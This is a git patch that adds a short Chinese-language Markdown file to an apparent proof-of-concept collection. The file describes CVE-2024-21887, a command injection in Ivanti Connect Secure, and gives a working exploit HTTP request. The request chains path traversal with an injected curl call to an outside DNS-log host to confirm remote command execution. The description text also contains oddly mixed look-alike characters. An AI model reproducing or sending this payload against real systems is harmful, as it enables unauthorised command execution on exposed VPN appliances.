From 1c1b3e8d6c6ee17aa42b499c39f29ad23345d434 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 18 Jan 2024 19:35:07 +0800
Subject: [PATCH] =?UTF-8?q?Create=20Ivanti=5FConnect=5FSecure=E8=BF=9C?=
 =?UTF-8?q?=E7=A8=8B=E5=91=BD=E4=BB=A4=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?(CVE-2024-21887).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...nnect_Secure远程命令注入漏洞(CVE-2024-21887).md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 Ivanti_Connect_Secure远程命令注入漏洞(CVE-2024-21887).md

diff --git a/Ivanti_Connect_Secure远程命令注入漏洞(CVE-2024-21887).md b/Ivanti_Connect_Secure远程命令注入漏洞(CVE-2024-21887).md
new file mode 100644
index 0000000..bf73aa7
--- /dev/null
+++ b/Ivanti_Connect_Secure远程命令注入漏洞(CVE-2024-21887).md
@@ -0,0 +1,14 @@
+## Ivanti_Connect_Secure远程命令注入漏洞(CVE-2024-21887)
+
+Ivаｎti Cоnnесt Sесurе（9.х、22.х）和 Ivаnti Pоliсу Sесurе 的 Wеb 组件中存在一个命令注入漏洞，使得经过身份验证的管理员能够发送特别构建的请求并在设备上执行任意命令 。
+
+## poc
+```
+GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20z5i19y.dnslog.cn HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
+Connection: close
+Accept-Encoding: gzip, deflate
+```
+
+![df97ad07a0d2c2d795cffdd955b1a38b](https://github.com/wy876/POC/assets/139549762/6c54dede-fb0f-4749-99c6-1324cae93042)